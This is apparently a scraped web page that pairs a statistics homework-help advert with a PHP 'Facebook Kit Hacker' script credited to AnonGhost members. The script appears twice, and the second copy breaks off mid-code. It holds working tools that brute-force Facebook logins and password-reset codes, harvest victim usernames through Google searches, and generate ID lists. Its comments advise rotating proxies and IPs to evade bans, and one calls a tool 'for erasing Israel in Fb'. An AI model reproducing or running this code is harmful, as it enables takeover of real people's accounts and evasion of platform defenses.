Are you a college student taking a statistics course and interested in getting help online? We provide stats help in areas related to research analysis, statistics homework and assignments, and completion of online classes. We are experts with many years of experience in the field, and vast competencies. Some of the statistical tools we can use in providing you with the needed help include SPSS, STATA, EXCEL, SAS, and R. We are competent in writing research methods sections for papers, literature reviews, chapters for data analysis, and the conclusion sections. In case you are interested in being helped with statistics assignments related to regression analysis, correlation, chi-square tests, hypothesis testing, inferential analysis, ANOVA models, multivariate regression, mixed-methods analysis, Non-parametric tests, and any analyses that apply complex methods, do not hesitate to contact us. We are available via WhatsApp:- +1 (617) 465-3618, or online on www.statisticsanswered.com.
Common Hacking 101
This is a technology website and its purpose is to educate the public on the latest technological advertisement as far as cyber security is concerned. The information provided on this website targets to inform the businesses about the steps they can objectively implement in order to remain secure.
PHP Facebook Password Bruteforce Script With Video ★ReskayLeaks★
PHP Facebook Password Bruteforce Script With Video ★ReskayLeaks★
<?php
session_start();
error_reporting(E_ERROR | E_PARSE);
@ini_set("max_execution_time",0);
@set_time_limit(0); #No Fx in SafeMode
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
// Use your mind to escape Facebook Security \!/
// Don't Allow Cookies in your browser (Use priv8 browsing)
// Change your IP and DNS each 2 seconds and your Job will be Great °_°
// GreetZ To : All AnonGhost MemberZ \!/
// You can edit this script but don't forget to mention the authors °_°
// Tutorial Video: https://www.youtube.com/watch?v=66a_wOwOT48
echo '
<html>
<title>Facebook Kit</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" />
<body style="background-color:black;">
<style type="text/css">
body {
background:
url("http://i.imgur.com/hg21xZ9.png") repeat ,
url("http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png") no-repeat center top,top left,top right;
background-color: #000000;
}
a{
text-decoration:none;
border:1px solid #12549c;
border-radius:5px;
background-color:black;
color:white;
font-family:Arial;
font-size:17;
box-shadow: 0px 0px 12px #21a0ed;
}
#r{
border-bottom:1px solid #12549c;
}
</style>
<head>
</body>
</html>
<center><font color="white" face="Orbitron" size="7" align="center">Facebook Kit Hacker v 1.2</font></center>
';
echo '<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly9oYWNrLXRvdXQuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE0LzAyL0ZhY2Vib29rLnBuZyIvPg==").'</center>';
echo '<center><font color="#007700" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">';
echo '</font></b></div><br></center>';
?>
<div id="det" align="center">
</div>
</center>
<div id="r" align="center">
<a href="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>"> Home </a></font>
<a href="?action=baipas"> FB Brute Force </a></font>
<a href="?action=brut"> FB Ghost Catcher </a></font>
<a href="?action=crack"> FB Reset Code </a></font>
<a href="?action=passgen"> Reset Code Generator </a></font>
<a href="?action=idgen"> FB ID Generator </a></font>
<a href="?action=graph"> FB ID Checker </a></font>
<audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
</div><br>
<?php
if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
@error_reporting(0);
function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
$validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
$validCharNumber = strlen($validCharacters);
$len = 10;
$result = "";
for ($i = 0; $i < $len; $i++) {
$index = mt_rand(0, $validCharNumber - 1);
$result .= $validCharacters[$index];
}
return $result;
}
echo'
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>
<p><center><font face="impact" color="White" size="4">Facebook ID Generator
</center><center></font><br>
<title>Facebook ID Generator</title>
<form method="post">
<font color="white">Number Of ID : <br><input type="text" name="nr"><br><br></font>
<input type="submit" value="Generate" name="fbmailgen">
</form><br>';
$len = $_POST['len'];
$nr = $_POST['nr'];
if ($_POST['fbmailgen']) {
echo"<textarea style='resize:none;' class='area' cols='45' rows='10'>";
for ($x=0; $x < $nr ; $x++){
echo "10000" . getRandomString() . "\r\n";
}
echo "</textarea><br>";
echo "
<br>
<b>
</b>
<br>
";
}
}
if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
@error_reporting(0);
function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
$validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
$validCharNumber = strlen($validCharacters);
$len = 6;
$result = "";
for ($i = 0; $i < $len; $i++) {
$index = mt_rand(0, $validCharNumber - 1);
$result .= $validCharacters[$index];
}
return $result;
}
echo'
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>
<p><center><font face="impact" color="White" size="4">Facebook Reset Code Generator</font>
</center><center><br>
<title>Facebook Reset Code Generator</title>
<form method="post">
<font color="white">Number Of Reset Codes : <input type="text" name="nr"><br><br></font>
<input type="submit" value="Generate" name="fbmailgen">
</form><br>';
$len = $_POST['len'];
$nr = $_POST['nr'];
if ($_POST['fbmailgen']) {
echo"<textarea style='resize:none;' class='area' cols='20' rows='10'>";
for ($x=0; $x < $nr ; $x++){
echo getRandomString() . "\r\n";
}
echo "</textarea><br>";
echo "
<br>
<b>
</b>
<br>
";
}
}
if(isset($_GET['action']) && $_GET['action'] == 'brut'){
echo"
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
select {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>
<title>F4c3b00k Gh0sT</title>
<form method='POST'>
<center><font face='impact' size='4' color='white'>Facebook Gh0sT Catcher by n0name-hax0r & Mauritania Attacker</font><br></center><br>
<center>
<center><font face='arial' size='1' color='red'>Server</font><br></center>
<select name=country><br><br>
<option value='Choose Country'>Choose The Country</option>
<option value='site:fr-fr.facebook.com/'>France</option>
<option value='site:ar-ar.facebook.com/'>Arab Countries</option>
<option value='site:es-es.facebook.com/'>Spain</option>
<option value='site:tr-tr.facebook.com/'>Turkey</option>
<option value='site:de-de.facebook.com/'>Germany</option>
<option value='site:pt-pt.facebook.com/'>Portugual</option>
<option value='site:it-it.facebook.com/'>Italy</option>
<option value='site:hi-in.facebook.com/'>India</option>
<option value='site:sr-rs.facebook.com/'>Serbia</option>
<option value='site:el-gr.facebook.com/'>Greece</option>
<option value='site:he-il.facebook.com/'>Israel</option>
<option value='site:id-id.facebook.com/'>Indonesia</option>
<option value='site:ru-ru.facebook.com/'>Russia</option>
<option value='site:nl-nl.facebook.com/'>Netherlands</option>
<option value='site:bg-bg.facebook.com/'>Bulgaria</option>
<option value='site:mk-mk.facebook.com/'>Macedonia</option>
<option value='site:uk-ua.facebook.com/'>Ukraine</option>
<option value='site:zh-cn.facebook.com/'>China</option>
</select><br><br>
</center>
<center>
<input type='text' name='victim' placeholder='Victim Name'><br><br>
<textarea name='pass' style='resize:none;' rows='10' cols='20' placeholder='Password List'></textarea><br><br>
<input type='submit' name='start' value='~~Start Catching~~'></center><br><br>
</form>
<center>
<font color='white'>(Use this tool using proxy and change the proxy every 1-2 mins to avoid getting banned from google)</font><br><br>
";
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
$country = $_POST['country'];
$victim = $_POST['victim'];
$bing = "{$country}"."{$victim}";
$password = explode("\r\n",$_POST['pass']);
//Function that gets google urls
function google_that($query, $page=1)
{
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}
function brute($user,$pass){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
$login = curl_exec($ch);
//print_r($login);
$check = (eregi('class="s t i u"',$login)) ? true:false;
if($check == true){
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font> Password : <font color='red'>$pass</font></font></p>";
}else{
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font> Password : <font color='green'>$pass</font></font></p>";
}
}
if(isset($_POST['start'])){
letItBy();
for($googlePage = 1; $googlePage <= 50; $googlePage++) {
$googleResult = google_that($bing, $googlePage);
if(!$googleResult) {
echo 'Finished scanning.';
break;
}
// Gets the username of victim
for($victim = 0; $victim < sizeof($googleResult); $victim++){
$result = $googleResult[$victim]['unescapedUrl'];
if($country == "site:fr-fr.facebook.com/"){
$rsss = str_replace("https://fr-fr.facebook.com/","",$result);
}
elseif($country == "site:ar-ar.facebook.com/"){
$rsss = str_replace("https://ar-ar.facebook.com/","",$result);
}
elseif($country == "site:es-es.facebook.com/"){
$rsss = str_replace("https://es-es.facebook.com/","",$result);
}
elseif($country == "site:tr-tr.facebook.com/"){
$rsss = str_replace("https://tr-tr.facebook.com/","",$result);
}
elseif($country == "site:de-de.facebook.com/"){
$rsss = str_replace("https://de-de.facebook.com/","",$result);
}
elseif($country == "site:pt-pt.facebook.com/"){
$rsss = str_replace("https://pt-pt.facebook.com/","",$result);
}
elseif($country == "site:it-it.facebook.com/"){
$rsss = str_replace("https://it-it.facebook.com/","",$result);
}
elseif($country == "site:hi-in.facebook.com/"){
$rsss = str_replace("https://hi-in.facebook.com/","",$result);
}
elseif($country == "site:zh-cn.facebook.com/"){
$rsss = str_replace("https://zh-cn.facebook.com/","",$result);
}
elseif($country == "site:sr-rs.facebook.com/"){
$rsss = str_replace("https://sr-rs.facebook.com/","",$result);
}
elseif($country == "site:el-gr.facebook.com/"){
$rsss = str_replace("https://el-gr.facebook.com/","",$result);
}
elseif($country == "site:he-il.facebook.com/"){
$rsss = str_replace("https://he-il.facebook.com/","",$result);
}
elseif($country == "site:id-id.facebook.com/"){
$rsss = str_replace("https://id-id.facebook.com/","",$result);
}
elseif($country == "site:ru-ru.facebook.com/"){
$rsss = str_replace("https://ru-ru.facebook.com/","",$result);
}
elseif($country == "site:nl-nl.facebook.com/"){
$rsss = str_replace("https://nl-nl.facebook.com/","",$result);
}
elseif($country == "site:bg-bg.facebook.com/"){
$rsss = str_replace("https://bg-bg.facebook.com/","",$result);
}
elseif($country == "site:mk-mk.facebook.com/"){
$rsss = str_replace("https://mk-mk.facebook.com/","",$result);
}
elseif($country == "site:uk-ua.facebook.com/"){
$rsss = str_replace("https://uk-ua.facebook.com/","",$result);
}
$users = explode("?", $rsss);
$users = $users[0];
//Bruteforce Function
foreach($password as $pass)
{
echo brute($users,$pass);
}
}
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
ob_start();
@set_time_limit(0);
#################################################
#---------------------------------------------- #
# Facebook Brute Force 2014 #
#Coded by : Mauritania Attacker&Noname-Haxor #
#Greetz : All AnonGhost Members #
#This Tool Is For Erasing Israel in Fb #
# --------------------------------------------- #
#################################################
echo "
<head>
<link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
<form method='POST'>
<title>Facebook Brute Force 2014</title>
</head>
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>";
echo "
<body text='#FFFFFF' >
<center><font color='White' size=4 face='impact' >Facebook Multi-Account BruteForce by Mauritania Attacker&Noname-Haxor </center></font><br>
<p dir='ltr' align='center'>
<textarea cols='22' class='area' placeholder='Username' rows='14' name='username'></textarea>
<textarea cols='22' class='area' placeholder='Password' rows='14' name='password'></textarea><br>
<br>
<input type='submit' name='scan' value='Start BruteForce'><br></p>";
if(isset($_POST['scan'])){
#To Put Proxy SOCKS V5
//curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
//curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
function brute($user,$pass){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
$login = curl_exec($ch);
//print_r($login);
$check = (eregi('class="s t i u"',$login)) ? true:false;
if($check == true){
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font> Password : <font color='red'>$pass</font></font></p>";
}else{
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font> Password : <font color='green'>$pass</font></font></p>";
}
}
$username = explode("\n", $_POST['username']);
$password = explode("\n", $_POST['password']);
foreach($username as $users) {
$users = @trim($users);
foreach($password as $pass) {
$pass = @trim($pass);
echo brute($users,$pass);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
echo"<br>
<br>
<br>
<br>
";
}
if(isset($_GET['action']) && $_GET['action'] == 'crack'){
/*
[+] Facebook Code Security Cracker
[+] Coded By : Mauritania Attacker
[+] GreetZ : All AnonGhost MemberZ
[+] FuCk Priv888888888888888888888
~~HACKING IS ART OF EXPLOITATION~~
<3 <3 <3 I'm not educated , I hate school , Hacking is my life xD !!!!!!!!!!!!!!!!!!!!!!!!!! <3 <3 <3
// How to use: Restore your victim account and better choose the email option :p , and the rest is to use your mind \!/
I suggest you to use an auto rotating proxy after each 2 minutes so you won't get banned :D , i've bypassed already the captcha
security and cookies ,so facebook won't let you try many attempts so proxy is the solution !
you still can add a proxy socks v5 option in Curl only two lines :
curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
You can edit my script and try to develop it more if you have some ideas you are free , but don't forget the Copyright wkwkwkwkwkwk xd <3
Sharing is Caring \!/
Sorry my english is bad and i'm lazy xD !
*/
@set_time_limit(0);
echo "<form method='POST'>
<title>Facebook Code Security Cracker > By Mauritania Attacker</title>
<style>
/* Rounded Corners */
#ghost {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
height: 250px;
width: 200px; }
input {
/* INPUTS */
border: 1px solid #12549c;
}
</style>
<center><font color='White' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Mauritania Attacker</center><br>
<center><input type='text' name='target' placeholder='Victim'></center><br>
<center><textarea cols='10' rows='6' id='ghost' placeholder='Reset Codes' name='code'></textarea><br></center>
<p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
</form>";
$target=$_POST['target'];
$user = explode("\r\n", $_POST['code']);
if($_POST['scan'])
{
foreach($user as $code)
{
// Curl Function ^_^
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version)
$check = curl_exec($ch);
if(eregi("password_new", $check)) //Keyword Good Response ^_^
{
echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found ^_^ </font><br>";
}
else
{
echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
}
curl_close($ch);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
echo "</center><center>";
ob_end_flush();
echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
if(isset($_GET['action']) && $_GET['action'] == 'graph'){
@set_time_limit(0);
echo "<form method='POST'>
<title>Facebook ID's Checker By Mauritania Attacker</title>
<style>
/* Rounded Corners */
#ghost {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
height: 250px;
width: 200px; }
input {
/* INPUTS */
border: 1px solid #12549c;
}
</style>
<center><font color='White' size='4' face='impact'>Facebook ID's Checker By Mauritania Attacker</center><br>
<center><textarea cols='10' rows='6' id='ghost' placeholder='ID Here ^^' name='code'></textarea><br></center>
<p><center><input type='submit' value='Check Now' name='scan'><br><br></center></p>
</form>";
$user = explode("\r\n", $_POST['code']);
if($_POST['scan'])
{
foreach($user as $code)
{
// Curl Function ^_^
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/{$code}");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
$check = curl_exec($ch);
if(eregi("username", $check)) //Keyword Good Response ^_^
{
echo "<font face='Tahoma' size='2' color='green'>{$code} => ID IS CORRECT ^_^ </font><br>";
}
else
{
echo "<font face='Tahoma' size='2' color='red'>{$code} => ID IS FALSE :(...</font><br>";
}
curl_close($ch);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
echo "</center><center>";
ob_end_flush();
echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
?>
<?php
session_start();
error_reporting(E_ERROR | E_PARSE);
@ini_set("max_execution_time",0);
@set_time_limit(0); #No Fx in SafeMode
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
// Use your mind to escape Facebook Security \!/
// Don't Allow Cookies in your browser (Use priv8 browsing)
// Change your IP and DNS each 2 seconds and your Job will be Great °_°
// GreetZ To : All AnonGhost MemberZ \!/
// You can edit this script but don't forget to mention the authors °_°
// Tutorial Video: https://www.youtube.com/watch?v=66a_wOwOT48
echo '
<html>
<title>Facebook Kit</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" />
<body style="background-color:black;">
<style type="text/css">
body {
background:
url("http://i.imgur.com/hg21xZ9.png") repeat ,
url("http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png") no-repeat center top,top left,top right;
background-color: #000000;
}
a{
text-decoration:none;
border:1px solid #12549c;
border-radius:5px;
background-color:black;
color:white;
font-family:Arial;
font-size:17;
box-shadow: 0px 0px 12px #21a0ed;
}
#r{
border-bottom:1px solid #12549c;
}
</style>
<head>
</body>
</html>
<center><font color="white" face="Orbitron" size="7" align="center">Facebook Kit Hacker v 1.2</font></center>
';
echo '<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly9oYWNrLXRvdXQuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE0LzAyL0ZhY2Vib29rLnBuZyIvPg==").'</center>';
echo '<center><font color="#007700" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">';
echo '</font></b></div><br></center>';
?>
<div id="det" align="center">
</div>
</center>
<div id="r" align="center">
<a href="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>"> Home </a></font>
<a href="?action=baipas"> FB Brute Force </a></font>
<a href="?action=brut"> FB Ghost Catcher </a></font>
<a href="?action=crack"> FB Reset Code </a></font>
<a href="?action=passgen"> Reset Code Generator </a></font>
<a href="?action=idgen"> FB ID Generator </a></font>
<a href="?action=graph"> FB ID Checker </a></font>
<audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
</div><br>
<?php
if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
@error_reporting(0);
function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
$validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
$validCharNumber = strlen($validCharacters);
$len = 10;
$result = "";
for ($i = 0; $i < $len; $i++) {
$index = mt_rand(0, $validCharNumber - 1);
$result .= $validCharacters[$index];
}
return $result;
}
echo'
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>
<p><center><font face="impact" color="White" size="4">Facebook ID Generator
</center><center></font><br>
<title>Facebook ID Generator</title>
<form method="post">
<font color="white">Number Of ID : <br><input type="text" name="nr"><br><br></font>
<input type="submit" value="Generate" name="fbmailgen">
</form><br>';
$len = $_POST['len'];
$nr = $_POST['nr'];
if ($_POST['fbmailgen']) {
echo"<textarea style='resize:none;' class='area' cols='45' rows='10'>";
for ($x=0; $x < $nr ; $x++){
echo "10000" . getRandomString() . "\r\n";
}
echo "</textarea><br>";
echo "
<br>
<b>
</b>
<br>
";
}
}
if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
@error_reporting(0);
function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
$validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
$validCharNumber = strlen($validCharacters);
$len = 6;
$result = "";
for ($i = 0; $i < $len; $i++) {
$index = mt_rand(0, $validCharNumber - 1);
$result .= $validCharacters[$index];
}
return $result;
}
echo'
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>
<p><center><font face="impact" color="White" size="4">Facebook Reset Code Generator</font>
</center><center><br>
<title>Facebook Reset Code Generator</title>
<form method="post">
<font color="white">Number Of Reset Codes : <input type="text" name="nr"><br><br></font>
<input type="submit" value="Generate" name="fbmailgen">
</form><br>';
$len = $_POST['len'];
$nr = $_POST['nr'];
if ($_POST['fbmailgen']) {
echo"<textarea style='resize:none;' class='area' cols='20' rows='10'>";
for ($x=0; $x < $nr ; $x++){
echo getRandomString() . "\r\n";
}
echo "</textarea><br>";
echo "
<br>
<b>
</b>
<br>
";
}
}
if(isset($_GET['action']) && $_GET['action'] == 'brut'){
echo"
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
select {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>
<title>F4c3b00k Gh0sT</title>
<form method='POST'>
<center><font face='impact' size='4' color='white'>Facebook Gh0sT Catcher by n0name-hax0r & Mauritania Attacker</font><br></center><br>
<center>
<center><font face='arial' size='1' color='red'>Server</font><br></center>
<select name=country><br><br>
<option value='Choose Country'>Choose The Country</option>
<option value='site:fr-fr.facebook.com/'>France</option>
<option value='site:ar-ar.facebook.com/'>Arab Countries</option>
<option value='site:es-es.facebook.com/'>Spain</option>
<option value='site:tr-tr.facebook.com/'>Turkey</option>
<option value='site:de-de.facebook.com/'>Germany</option>
<option value='site:pt-pt.facebook.com/'>Portugual</option>
<option value='site:it-it.facebook.com/'>Italy</option>
<option value='site:hi-in.facebook.com/'>India</option>
<option value='site:sr-rs.facebook.com/'>Serbia</option>
<option value='site:el-gr.facebook.com/'>Greece</option>
<option value='site:he-il.facebook.com/'>Israel</option>
<option value='site:id-id.facebook.com/'>Indonesia</option>
<option value='site:ru-ru.facebook.com/'>Russia</option>
<option value='site:nl-nl.facebook.com/'>Netherlands</option>
<option value='site:bg-bg.facebook.com/'>Bulgaria</option>
<option value='site:mk-mk.facebook.com/'>Macedonia</option>
<option value='site:uk-ua.facebook.com/'>Ukraine</option>
<option value='site:zh-cn.facebook.com/'>China</option>
</select><br><br>
</center>
<center>
<input type='text' name='victim' placeholder='Victim Name'><br><br>
<textarea name='pass' style='resize:none;' rows='10' cols='20' placeholder='Password List'></textarea><br><br>
<input type='submit' name='start' value='~~Start Catching~~'></center><br><br>
</form>
<center>
<font color='white'>(Use this tool using proxy and change the proxy every 1-2 mins to avoid getting banned from google)</font><br><br>
";
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
$country = $_POST['country'];
$victim = $_POST['victim'];
$bing = "{$country}"."{$victim}";
$password = explode("\r\n",$_POST['pass']);
//Function that gets google urls
function google_that($query, $page=1)
{
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}
function brute($user,$pass){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
$login = curl_exec($ch);
//print_r($login);
$check = (eregi('class="s t i u"',$login)) ? true:false;
if($check == true){
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font> Password : <font color='red'>$pass</font></font></p>";
}else{
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font> Password : <font color='green'>$pass</font></font></p>";
}
}
if(isset($_POST['start'])){
letItBy();
for($googlePage = 1; $googlePage <= 50; $googlePage++) {
$googleResult = google_that($bing, $googlePage);
if(!$googleResult) {
echo 'Finished scanning.';
break;
}
// Gets the username of victim
for($victim = 0; $victim < sizeof($googleResult); $victim++){
$result = $googleResult[$victim]['unescapedUrl'];
if($country == "site:fr-fr.facebook.com/"){
$rsss = str_replace("https://fr-fr.facebook.com/","",$result);
}
elseif($country == "site:ar-ar.facebook.com/"){
$rsss = str_replace("https://ar-ar.facebook.com/","",$result);
}
elseif($country == "site:es-es.facebook.com/"){
$rsss = str_replace("https://es-es.facebook.com/","",$result);
}
elseif($country == "site:tr-tr.facebook.com/"){
$rsss = str_replace("https://tr-tr.facebook.com/","",$result);
}
elseif($country == "site:de-de.facebook.com/"){
$rsss = str_replace("https://de-de.facebook.com/","",$result);
}
elseif($country == "site:pt-pt.facebook.com/"){
$rsss = str_replace("https://pt-pt.facebook.com/","",$result);
}
elseif($country == "site:it-it.facebook.com/"){
$rsss = str_replace("https://it-it.facebook.com/","",$result);
}
elseif($country == "site:hi-in.facebook.com/"){
$rsss = str_replace("https://hi-in.facebook.com/","",$result);
}
elseif($country == "site:zh-cn.facebook.com/"){
$rsss = str_replace("https://zh-cn.facebook.com/","",$result);
}
elseif($country == "site:sr-rs.facebook.com/"){
$rsss = str_replace("https://sr-rs.facebook.com/","",$result);
}
elseif($country == "site:el-gr.facebook.com/"){
$rsss = str_replace("https://el-gr.facebook.com/","",$result);
}
elseif($country == "site:he-il.facebook.com/"){
$rsss = str_replace("https://he-il.facebook.com/","",$result);
}
elseif($country == "site:id-id.facebook.com/"){
